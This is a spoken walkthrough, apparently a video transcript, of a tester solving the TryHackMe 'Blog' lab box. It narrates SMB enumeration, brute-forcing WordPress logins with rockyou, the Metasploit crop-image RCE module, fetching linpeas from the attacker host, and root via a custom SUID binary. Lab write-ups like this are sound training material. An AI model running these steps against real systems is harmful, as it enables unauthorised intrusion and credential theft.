Hello, welcome back to Sabretooth and Nethemba. We care about your security. It's Try Hack Me Tuesday. Gone for a medium box, and the reason is, look, easy, I've done 11. Hard, I've done 11. Medium is lagging behind at 9. Plus, as the last thing I did was this one on Hack the Box, Insane, Jail, Nightmare. Maybe something just a little bit easier, hopefully. So this one is called Blog. We are waiting for the IP right now in 28 seconds. I don't really want to... Yeah, it looks like we've got some information here. I don't want to read any of that, so... I've not asked Rick whether I should read the questions or not. I've fallen into this trap before. Anyway, we will wait 11 seconds and see what's going on. So, Nmap, T5, all ports, aggressive scam. And then the IP goes here, and we are going to check the web as well. Ooh, okay, we do have one. We do have one, but this is messed up. And the reason this is messed up is because it's trying to get all the resources from blog.thm, blog.thm/feed, blog.thm comments feed, rather than from the IP address, right? So the way to counter this is I'll check that in a second. We go sudo nano our local host file. And we put in the IP of our system, the IP of the target system, sorry, and then what it's expecting, blog.thm. And now, whenever it tries to grab from blog.thm, it will grab from here, or vice versa, right? That makes sense? Not vice versa. You know what I mean. So, if I now go to blog.thm, in fact, I don't have to. I can do it from the IP, but now it knows to grab where to grab things when it says blog.thm, but I may as well just do that. Leads to the same place, does the same thing. Karen Wheeler, interesting. Author K Wheel. This looks like WordPress. This massively looks like WordPress. WordPress.org. Is that a giveaway? Powered by WordPress. How about that? Yeah, this is WordPress. Billy Joel's blog. Oh, didn't know he did. Didn't know he blogged. Right. Let's check this. We have quite a bit of data here. So let's see if we can sort this out. We have port 22, which is SSH, and port 80, which is HTTP. There is a robots text with one entry. WordPress 5, I think, is quite vulnerable. WP admin, etc., etc. It also has the Samba ports open as well. Interesting. Okay. Right. So as we have Samba, we are going to do enum for Linux for blog.thm. Let's see what this comes back with. See if we get any useful information here. We have... Okay, so we've got a share here, Billy's local SMB share. Any which end in $sign are just default ones, and generally you can't use them. Work group, okay, so we have that. Let's make a note of that. Enum for Linux shows that. And we could get usernames as well. I suppose we've got Karen Wheeler or K Wheeler, but we could get from here a username or 2 or 3, maybe. So I'm going to let that run. In the meantime, it makes a lot of sense for us to do WP scam. I think it has a hyphen. It doesn't have a hyphen. Fine. We will do that with update because it's been a while. Okay, B Joel, your local user, and that means K Wheeler. As you can see here, K Wheel, maybe another user here. or K Wheeler, I'm not sure. So we will also make a note of that. So we've got a user on the system, and there's nobody as well. We've had access to that account before on the last box we did. It literally has nearly no rights. Okay, fine. So I'll leave that to run. That's updated. So whilst this is happening, I'm going to run this on http blog.thm. Yeah, we need URL in there. And I'm going to enumerate users. I think I'm going to enumerate users and see what this does. Okay, so there's nothing else useful here. What I'm now going to do is use SMB client to connect to this share if I can. We're going to list, I think it's L for list. It should say Billy SMB. And we're going to go to blog.thm. That's not right. Is it capital L? Okay, it's after my name. So this has the same info, right? This has exactly the same info as what we just got. So if we didn't use enum for Linux, this is still massively possible with SMB client. Now what I'd like to do, let me just make sure this recording's going okay, it seems to be. What I'd like to do, clear that, is SMB client, and then we are doing blog.htm, sorry, is that what I said? And then the name of the share, which is Billy SMB. And I want to see if it allows us access to this share. Put a slash after it. Okay, so we can ls. Okay, so we have 3 files here, which could be useful, could be not. I'm not sure if we can do lsa to get any hidden files. No, we can't. Okay, so we could download all of these. Let me just check something. Okay, don't mind me. So we could get this. We can get this. I mean, what's an MP4 file going to do, really? And we could get this. Okay. We get all the files. Don't really need to show how we do that. It's quite obvious how we do that. So we're going to clear that, ls, and you can see that we have these here. So let's open this in a file manager. What's the name of the box? Blog. Okay. Not sure about this, if it's important. It could be. It might have steg hide or something. We have a video file. No, I'm not listening to Taylor Swift. And we've got a QR code, which quite honestly I'm just going to scan with my phone because I can't be bothered to do anything else with it. So QR code scanner, bear with me. Oh, it goes to YouTube. Billy Joel, we didn't start the fire. Fair enough. So that's useless as well. Okay, all 3 files. Theme useless. I'm going to put theme because it might not be. Let's go back to the scan. I might listen to that Billy Joel track later. I do really like it. Okay, so we've got Karen Wheeler, as we know, Billy Joel, as we know. So K Wheel and B Joel. So K Wheel is the actual username. Okay. So we might be able to brute force the password for these, but I'm not going to bother just yet. WP scan for user enum shows. Let's read the rest of the output. We'll go from the top. So we have robots.txt, which I didn't check this time because I realized it was WordPress, so I know it would have that stuff in it. Upload directory has listing enabled. That's quite useful in case we get to upload something later. We can list all our files. Yeah, I mean, WordPress version 5 is like released in 2018. That is old. I won't be surprised if there isn't a really good exploit for that. I will check that in a second. We've got a theme in use, obviously. We have not yet looked for vulnerable or any other kind of plugins. So we will do that. We're going to do all plugins, and then detection. Is it detection? I can never remember this. So WP scan help. Is it plugin detection mode or passive? I can't remember. We could also try brute forcing users. Plugins version detect. Do you see why I can't remember this? It's really awkward. So we'll go back to that, put that in, and set the mode to aggressive. Now there was a quicker way of doing this. There's another app that I use, which I've installed, and I've used before. I should probably check that out as well. It depends how long this is going to. Oh, all plugins via passive methods. I didn't. Huh. Fairly sure I just put aggressive there. That's very weird. Oh, vulnerability data has not been output because of no WP scan API token. Oh, that's just annoying. I don't want to sign up. You see, I don't want to sign up. Let's use this other app. I'm going to go right back here. I'm going to go to my home directory, into Go. Into bin. WP probe. That was the one. Okay, so we can update this one as well, I suppose. And update DB as well, I suppose. Back to here. So it's just WP probe command, I guess. So we can scan and then whatever. So we'll do that. And then scan. And then we put in http blog.thm. I think that's it. URL. No plugins detected. Wow. Okay, so I'm guessing that that's done. I'm guessing then that plugins are not the way to go here. Maybe I can actually brute force a username here. So how are we going to do this? WP scan help. We're going to usernames list. So we could give it a list like this. So we'll try that. We're going to run this with usernames, capital U for usernames list, and then we'll give it B Joel and K wheel, and then passwords file path. Give it a list of passwords. We're going to go back, tools, wordless, rock you dot text. Probably give it some threads, but I'll leave it like that for now and just see what happens. WordPress version was 5, wasn't it? Ah, there we go. Performing password attack. Nice. that's now running, so I'm going to leave that running forever. Oh my god. Oh, that's not good. Anyway, whilst that's going, what was I going to do? Search exploits. WordPress core 5. Ugh. There's a lot of these. So no, because like these are all one point whatever. So I'm looking for 5.0 really. So it's only these ones here that I need to be concerned with, and probably these ones here. But these are denial of service or whatever, unauthenticated or private posts. Okay, remote code execution for 5.0. If I actually just put in 5.0, you'll actually see that there's now 2 here which look useful, a Metasploit one and a regular remote code execution. That's JavaScript file. Interesting that there's something in Metasploit shell upload 5.0.0. Let me go back to this. Let's have a look. Yeah, 5.0 identified. I'm not sure if it's 5.0.0. But if 5.0 is identified, at least that's something. I don't think this is going to come up with anything, not with this many possible... oh my god, success, straight off. Well, not straight off, but however long, 6,000 words in. Okay, we've got username, password. Life is better. Life is better. So let's make some notes of what we've got. In case it's needed. WordPress version is shown as 5.0. Search exploit shows for those. So we'll keep that in mind in case we need to come back to it. Obviously, the denial of service one is not important or whatever. Fine. Okay, so we also now have this. I'm going to have to kill that in order to copy it. Oh, that's annoying. Do you know what? I will. Because if I cancel it now, then I can get rid of kwheel from here and just run on bjoel. But first, I'm going to copy that. Nice. Good. So, WP scan user brute force shows kwheel qtpy. Now, hopefully, this is a case of logging into WP admin. Try again. WP-admin as kwheel and whatever this was, qtpy1, and then just uploading a reverse shell in the theme, providing she has rights to do so. So that's still going, and it's going to take 77 hours if it gets to the end. Okay, so we can't actually get to the themes here. That's not good. That's not good. This gives us... I should try SSH as well. At WP admin. This gives us access to WP admin, but we do not have rights to edit a theme, as we usually do. So we may need to look around a little bit. Let's try SSH on this as well. SSH kwheel at blog blog.thm qtpy1. Okay, so that doesn't work. Worth a try. Worth a try. Okay, so that's still running because I'm guessing bjoel will have more rights, maybe to edit the theme or whatever. But look, it's going to take absolutely forever unless the password is a little bit higher up in this list. Let's see what options we do have. There must be a reason that we've got. We've got these exploits, by the way, which we can look at, remote code execution. It might help now that we've got access to a user. We'll try that in a minute, but let's just have a look around. Posts. Two posts, two comments, recent comments. That one's a draft. That's quite interesting. What's this? Doesn't look important. Media library. So we've got media items. I don't think we can upload things here at all for WordPress. Comments. The comments we've already read, I think, haven't we? So we've got an email address here. Oh, we've got two email addresses here. So where does that leave us then? Profile and tools. I mean, I remember that thing before when I was able to change the rights. I don't think that's for this version though. I think we should start looking at these exploits quite honestly at this point. We'll look at the MSF one because why not? That's probably the easiest one to try first, and then if it doesn't work out, we're not wasted tons of time trying to get some code working because Metasploit pretty much handles that for us. So we'll start with that one. Crop image shell upload. Remote coding. I'm very interested about that. I'm very intrigued about this. We'll do this again with the www and start reading some of these just to see what's going on. This top one. I've not seen before. So it looks like it's attaching image. So this might be the same, the shell crop upload thing. Well, it's uploading media anyway. Could be an image. Yeah. So this might be the same, but manual. The crop and for URL. So this is the same as the Metasploit one, but this is the manual run this yourself sort of thing. That's quite intriguing. Let's see then whether MSF can help us here. So we're going to search for crop image WordPress. I don't know. We'll find it. That's the one. WP crop RCE WordPress crop image shell upload. So we're going to use 0. Show options. I've not used this in a while. We need a user and a password to authenticate with. This is great because we now got one. That makes sense. The idea was to use this all along, I think, but now we've got credentials. This is awesome. So I'll tell you what, we're going to set password as QTPie1. Was that right? It was. We're going to set username as kwheel. Okay, let's see what else needs setting. The proxies don't need setting. The R hosts obviously do. So set R hosts to blog.thm. Our port is 80. Yes, it is running on port 80. It doesn't use SSL. Target URI, the base path to the WordPress application. Yeah, that's at the root of the site, isn't it? Yeah, absolutely it is. Okay. The theme directory, we don't need that. I mean, we could. It was 2020, isn't it? Well, it might auto-detect it. So I think that's it. So this is going to use Meterpreter. We need to set our L host, which I think is still 102.67. It is indeed. So we're going to set L host there. We'll leave the port as it is, and it says that it's WordPress. So if I do show options one more time, I can now put this in my notes because it's complete, and we know which exploit it is because it says it here, right? I'm not saying this is going to work though. I am saying that it's likely to. So all we actually have to do now, everything's set up, is hit exploits, and hopefully we get a shell. Hopefully. Well, it's authenticated, that's a good start. Preparing payload. Uploading payload. Image uploaded. Good. Nice. So this is the automated version of that manual one we was just looking at. Image is uploaded, but now what? Is there anything I actually need to do, or is it just going to take a little bit of time to figure out what's going on? Okay, including into theme. It's just taking a while. It's doing its thing. There is every chance it could fail at any point, but at the minute everything's looking quite positive. So with fingers crossed, we can hope. Oh, it's sending the stage. We can hope to get a shell. $10.10.2385. Is that right? It is. Okay. Attempting to clean up files. Come on, we're getting there. I suppose if it dies at this point, like it messes up on cleaning up files, that's not a problem. That's still there. As long as it gets me my shell, I don't care. Edge of my seat stuff, guys. Edge of your seat. It's taking a scarily long time, I'll tell you that much. I do worry. I'm going to check my messages. Oh, I'm not. I was going to check my messages while I do this, but there's no point. Don't think anybody loves me enough to send me any messages. That's fine. Come on. Interpreter session 1, yes. Get UID. www data is who we have our shell as. That is amazing. We actually have Meterpreter access, meaning we can upload all sorts of things using Meterpreter, but I'm actually just going to drop to a shell because I want to do this without any of Meterpreter's amazing functions. So I could just do like, who am I from here? And now we have a, oh, we can't do that. Now we have a shell, but we can do like Python C import PTY module, and then from the PTY module we're going to spawn a new shell, which is bin bash And hopefully now it'll give me a bit more of a... There we go. That's what we expect to see, right? So now we have a shell, which is kind of beautiful. The thing is, the beauty of this is that we can go back to Interpreter at any point if we want to. So if we want to upload something, rather than using wget or whatever, we can literally just do this. Good. We've got a shell. Fantastic. We are www data though. I wonder if we can get Billy Joel's password from the database. Let's cat. You see this file here that was put in by the exploit, I think. Let's cat wp config and see if there's any database credentials in here. Yeah, there absolutely is. Okay, there absolutely is. But I'm assuming it's going to be... I assume it's going to be encrypted in the same way, and or hashed in the same way, sorry. And therefore, the brute force might not work for Billy Joel's user. I mean, this is going to take forever. We can cancel this now. Maybe using Hydra would be quicker. But I think we're just going to kill that now because we've got access to the base system. So I'm happy enough with that. Out of curiosity, let's... where am I? Where am I? Where am I? Help! Oh, it's the first one. There we go. Let's cd to home. So can we cd into here? Interesting. Oh, don't do the whole try harder thing. I mean, you're not offset. Don't do it. It's ridiculous. It's bad enough when offset was giving all that crap. It's not. Try smarter, not harder, basically. It just annoys me so much, that term. It's basically the hacking equivalent of Dark Souls get good, you know? It doesn't help. It's true, but it doesn't help. Okay, that's me absolutely ranting about everything. So I'm guessing we can use limpies and figure out what to do next. It's been a while since we've used limpies. I'm not for the last few boxes, so let's actually do so this time. We're going to cd into prives scripts. There we go. Clear that. Sudo no. Sudo. Come on, Python 3. See how long it's been. HTTP server. That's not right. And that's not right. We want to port 80. There we go. Blimey, that's awful. So we're going to go into temp. We're going to do get. I know there's another document in there, Billy Joel termination, whatever, but as much as I'm saying it's probably not important, it might be, so maybe I should think about that. A bit pain in my neck, that's not good. It's really not pleasant. Anyway, wget http 10.14.102.67, I think. Limpies change the mode of that to executable, and then run limpies.limpass.sh. Okay, and we've got our p. That's good. That's fine. Oh, I didn't check. I didn't check sudo. I really should check sudo. You know. Right. Whilst this is running, I am going to check my messages because this might take a while. This might take a while. I've not even been looking at this, but I'm going to pull this up anyway and go from the top. I just need to wait for that to stop moving first. Ugh. God, it has been a while since I've looked through some Limpy's output. I don't know. So, I've not got any important messages that need covering straight away. Let's start looking through this. What are we doing? So we have we can just use the Pwn kit and be done with it, but I'd rather not. There's one I can't remember what I was going to say. I can't remember what I was going to say. I was going to say something. I'm not finding anything useful here as of yet. Placeholder. Listeners. We don't care about listeners generally. Blog THM blog. Name server. Okay. Anything running locally, just the name and the database and the name server. Okay, that's fine. DNS port, that's fine. Okay. Useful software. Okay. Enabled blog. Okay. PHP INI. So again, if I hadn't got that manually, we can get it from here. This WordPress database thing. There could be other users in the database, but I strongly doubt it because it only showed 2 from WP Scam. Permit root login, yes. Host, okay. Okay. Hang on. It's flicking all over the place. GPG, FTP, logon command script. Analyzing Windows files. Okay. Bash. Okay. Files with interesting permissions. Password. New group. Huh. Unknown SUID binary. Interesting. Let us make a note of that. Limpy's shows. We will definitely make a note of that. Let's check out. Let's keep looking. Yeah. Okay. Okay. There's no capabilities here which could be useful as far as I can see. What's this section? Writable files. None of these look too important. WordPress WP admin. Okay. Oh man. Then there's all the var, www and all that stuff. Interesting files. User bin get text. User checker. Yeah, we know about checker. We know about checker, exactly. Unexpected in root. Modified. Interesting files. No. Home data. Yeah, sure. That user.txt is bugging me because it should be there and it's been deliberately hidden, and that's just stupid, really. So we've got password. Yeah, we know all this stuff. I think we should probably try and get that. We should probably try and get that PDF file as well. So the first thing we'll do is we'll go back to home. So can we copy? I just want to see if we can move this around or read it or something. Oh, hang on. It's easier if we just do LSL, right? No, it can only be read by the Billy Joel user or root, obviously. Oh no, I can read it, apparently. I can read it. Okay. So I'm not sure how to do this on terminal. Tell you what I could do though. I'll tell you what I could do. I could copy that to var www html test.pdf. No, I can't do that. What about all these writable files that I've just been told I've got? Hang on. Where are they all? Files inside of others' home. Interesting files. Writable files. Ah, it's not var www html. It's var www Wordpress. So if I try this again, copy bill whatever to here, bill.pdf. That means that technically, if I now go to the website and go to bill.pdf, lovely. This letter is to inform you that your employment with Rubber Ducky, oh clever, Rubber Ducky, they're the vulnerable USB sticks and things. They're quite good for use for attacking and things. Employment with Rubber Ducky Inc. will end effectively immediately. Offences regarding removable media, yeah, USB. Acceptable use, tardiness, you'll receive compensation. Okay. Karen Lawson. Interesting. Right. Okay. We copy the PDF file from Billy's home folder to the web root and access it there. I don't think this is important though. Hang on a minute. USB sticks, CD media, CD USB. Permission denied. Damn, look, there's something there. Oh, wow. Right. Okay, this mentions Rubber Ducky, USB sticks, and this leads us to this, but access denied, right? Okay, I'm not sure if that's going to be important or not, but it's there anyway. So what we need to now do is look into this chicken. Where is it? Here, checker. I don't know what it does, let alone, I don't think, because it says it's an unknown binary. So that means I strongly believe that GTFO bins won't have it. It's custom. Yeah, nothing, right? Okay. So, all right. So let's just run this. Checker. Not an admin. Okay. Okay, so I'm tracing through the program. This is what I generally do. I could use strings and find the same thing. So if we run, I only figured out about ltrace like a few boxes ago. I used to know about it and use it, and then I forgot about it for years. And then a few boxes ago, when I was doing that debugging on, which box was it? Which box actually was it? I think it was this one, Charon. I think it was this one. Maybe it wasn't. Yes, this one with the filtered characters and stuff like that. Supershell, that was it. So ltrace, I can't remember if I used it there or thought about using it there. So that's what sort of put me onto this idea. Okay, so as for the SUID, ltrace shows get, and that's an environment variable which is set to nil. So yeah, that's not set. So if we export admin equals, don't know, admin, and then try it again, that's now set. So if I run checker, oh my god, brilliant. Well, I didn't expect it to do that, but it gave me root access. Ha! Fine. Fine. At least it was logical. At least it was logical, and now maybe I can get into that USB drive as well. We therefore set the admin environment variable and try again. Great. www data. What the heck have I just copied? Oh, I copied that. I see. Copy the whole thing, shall we? So first we are going to cat root.text, which is obviously quite useful. I'm intrigued about that USB. We've got to go in there. CD, media, USB. And we found a user.txt file. That's really funny. Okay, that was quite logical at least. Good job I read that PDF in the end, otherwise I'd never have found that. It might have been in Olympias, I must just have missed it. I don't know. Guys, we're done. This one was very nice, actually. Very nice. So, how long have we been? 50 minutes-ish. Oh, not done yet. Excuse me. So, root.text. Root.text is this one. User.text is this one. Am I still using burp sweep for this? Disable. Let's try that again. So let's reload the page, shall I? I'm not sure if I was still set to burp sweep or not. Did I use burp? Can't remember. What is going on? Why is this site not loading? Well, we're done anyway. I just can't input any of our findings. Maybe TryHackMe is having issues today. Moo.com. Yeah, my web's working fine. Internet access working fine. TryHackMe is not. Lame. Ah, site's down, whatever. So, I mean, the thing is, we've got the... Can I go back? Can't go back. Oh, it did something then. I saw it. Look, I think we're done, guys. So, hang on. If I hit escape, well, that... There we go. That stops it loading there. I don't know. Oh, there we go. It's going again. It's going again. I was going to say I'll leave it till after I finish this video, but it just seems like TryHackMe is having issues today, which does happen. It does happen, but let's see if we can get this finished out, shall we? Yeah, failed save sound preferences. I find 500 code. I find that TryHackMe has issues a lot more than HackTheBox does. It's actually quite lame, to be honest. Even my own website's up more than TryHackMe is. So I don't know what they're playing at. Anyway, we're done. We've got the things. I can't remember what the questions were. I didn't look at them. But we have the root flag. We have the user flag. And for me, that's good enough because anything else we can answer based on our notes. So this is the first time, guys, that I'm not actually finishing. Oh no, hang on. Oh, maybe. I was going to say this is the first time I'm not actually finishing a box with regards to getting the fanfare. But we have finished the box with regard to getting what we need to get. So I'm leaving it here. I'll fill this in when I can, when it allows me to. I appreciate your support regardless, so thank you for joining. Next time we are moving on to HackTheBox. Let's take a look what's coming up there. I think it's blocky. Oh, I'm not logged in. That's fine. I won't do that. I think it might be blocky next. I'm not sure what that's going to be about. It's blocky, Lego. Oh, maybe Kubernetes, because cubes, perhaps. It's very possible. Anyway, please share this video around, share the playlist around if you can, and please visit Nethemba.com for all your pen testing needs. Thank you so much, guys. And hopefully TryHackMe will be back up for next Tuesday. Cheers. Thank you. Goodbye. I'm actually back. I've just left it a few minutes, 10 minutes or so, and then tried loading it again, and here it is. I just don't like leaving things unfinished. I'm kind of hoping that it will accept my answers at this point, because otherwise, if things are reset, then some of these flags may have changed. Oh no, it is accepting it. That's quite nice. That's good. So let's just crack on with this while we can. So there's the root flag, there's the user flag. Where was user found? That was in media USB. What CMS was Billy using? Quite honestly, I reckon I can just... Yeah, WordPress. I didn't know if it needed a version. It was 5.0.0, wasn't it? Something. Oh, well, that's here, 5.0. Okay, so it is there. I've turned the sounds off, by the way. You like that? So as it happens, oh no, task two, the important one, credits. Congratulations to the creator. Well done. Fantastic. As it happens, we've actually got the fanfare. Without the noise, thank you once again. And my usual outro I've already done. So goodbye, have fun, see you soon.